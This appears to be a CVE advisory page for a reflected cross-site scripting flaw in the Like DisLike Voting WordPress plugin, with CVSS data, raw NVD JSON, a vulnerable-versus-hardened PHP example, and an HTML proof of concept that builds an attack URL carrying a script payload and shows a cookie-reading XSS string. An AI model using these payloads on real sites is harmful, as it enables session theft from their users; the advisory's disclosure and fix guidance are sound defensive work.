Security Vulnerability Report
CVE-2025-14129 CVSS 6.1 MEDIUM

CVE-2025-14129

Published: 2025-12-12 04:15:48
Last Modified: 2026-04-15 00:35:42

Description

The Like DisLike Voting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
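As an added example, not code from the plugin or from this report: the unescaped `$_SERVER['PHP_SELF']` output pattern behind CWE-79, next to two hardened forms. The function names and form markup are hypothetical; the WordPress variant assumes `admin_url()` and `esc_url()` from core.

```php
<?php
// Added example (hypothetical helper names; not the plugin's own code).
// $_SERVER['PHP_SELF'] is derived from the request path, so a client can
// append arbitrary characters after the script name (PATH_INFO) and have
// them land in any page that echoes the variable without escaping.

// VULNERABLE: the request path is written straight into an HTML attribute,
// which is the CWE-79 pattern the advisory describes.
function ldv_form_vulnerable(): string {
    return '<form method="post" action="' . $_SERVER['PHP_SELF'] . '">'
         . '<button name="vote" value="like">Like</button></form>';
}

// HARDENED (plain PHP): escape for the attribute context before output.
// ENT_QUOTES also encodes single quotes; " becomes &quot; and < becomes &lt;,
// so injected text can neither terminate the attribute nor open a tag.
function ldv_form_escaped(): string {
    $self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<form method="post" action="' . $self . '">'
         . '<button name="vote" value="like">Like</button></form>';
}

// HARDENED (WordPress): do not reflect the request path at all. Build the
// action URL from a known base with admin_url() and escape it with esc_url(),
// the core helpers for URLs placed in attributes.
function ldv_form_wp(): string {
    $action = esc_url( admin_url( 'admin-post.php' ) );
    return '<form method="post" action="' . $action . '">'
         . '<input type="hidden" name="action" value="ldv_vote">'
         . '<button name="vote" value="like">Like</button></form>';
}

// Self-check outside WordPress (ldv_form_wp() needs WP loaded): constructed
// request path carrying extra characters after the script name.
$_SERVER['PHP_SELF'] = '/wp-admin/admin.php/injected"><i>x</i>';
echo ldv_form_vulnerable(), PHP_EOL; // attribute closed early; <i>x</i> becomes live markup
echo ldv_form_escaped(), PHP_EOL;    // action="/wp-admin/admin.php/injected&quot;&gt;&lt;i&gt;x&lt;/i&gt;"
```

Escaping repairs this one output site; the WordPress form is the stronger fix because it never trusts the request path, which is also worth checking in the rest of the plugin's templates.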

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Like DisLike Voting plugin for WordPress <= 1.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-14129 PoC: Reflected XSS in Like DisLike Voting WordPress Plugin -->
<!-- Target: Like DisLike Voting plugin <= 1.0.1 -->
<!-- Attack Vector: Malicious URL via $_SERVER['PHP_SELF'] -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-14129 PoC</title>
</head>
<body>
  <h3>CVE-2025-14129 Reflected XSS PoC</h3>
  <p>Target: Like DisLike Voting plugin for WordPress <= 1.0.1</p>

  <!-- Malicious URL that triggers the XSS -->
  <p>Malicious URL:</p>
  <code id="malicious-url"></code>

  <script>
    // Construct the malicious URL
    // The XSS payload is injected into the PHP_SELF path
    var targetBase = window.location.origin + '/wp-admin/admin.php';
    // "<\/script>" keeps the literal from closing this <script> element early
    var xssPayload = '<script>alert("XSS CVE-2025-14129")<\/script>';
    var maliciousUrl = targetBase + '/' + xssPayload;
    document.getElementById('malicious-url').textContent = maliciousUrl;

    // Example attack scenario
    console.log('CVE-2025-14129 Attack URL:', maliciousUrl);
    // When victim visits this URL, the XSS payload in PHP_SELF will be reflected
    // and executed in the victim's browser context
  </script>

  <!-- Simulated attack flow -->
  <h4>Attack Scenario:</h4>
  <ol>
    <li>Attacker crafts a malicious URL containing XSS payload in path</li>
    <li>Victim is tricked into clicking the malicious link</li>
    <li>Server reflects the unsanitized PHP_SELF in response</li>
    <li>Victim's browser executes the injected JavaScript</li>
    <li>Attacker steals session cookies or performs actions as victim</li>
  </ol>

  <!-- Direct XSS payload for reference -->
  <p>XSS Payload: <code>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></p>
</body>
</html>

References

https://plugins.trac.wordpress.org/browser/like-dislike-voting/tags/1.0.1/files/function.php#L76
https://plugins.trac.wordpress.org/browser/like-dislike-voting/trunk/files/function.php#L76
https://wordpress.org/plugins/like-dislike-voting/
https://www.wordfence.com/threat-intel/vulnerabilities/id/25dfa483-26c6-43d1-9a24-9ea245b54f4c?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14129",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:47.553",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Like DisLike Voting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/like-dislike-voting/tags/1.0.1/files/function.php#L76",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/like-dislike-voting/trunk/files/function.php#L76",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/like-dislike-voting/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25dfa483-26c6-43d1-9a24-9ea245b54f4c?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}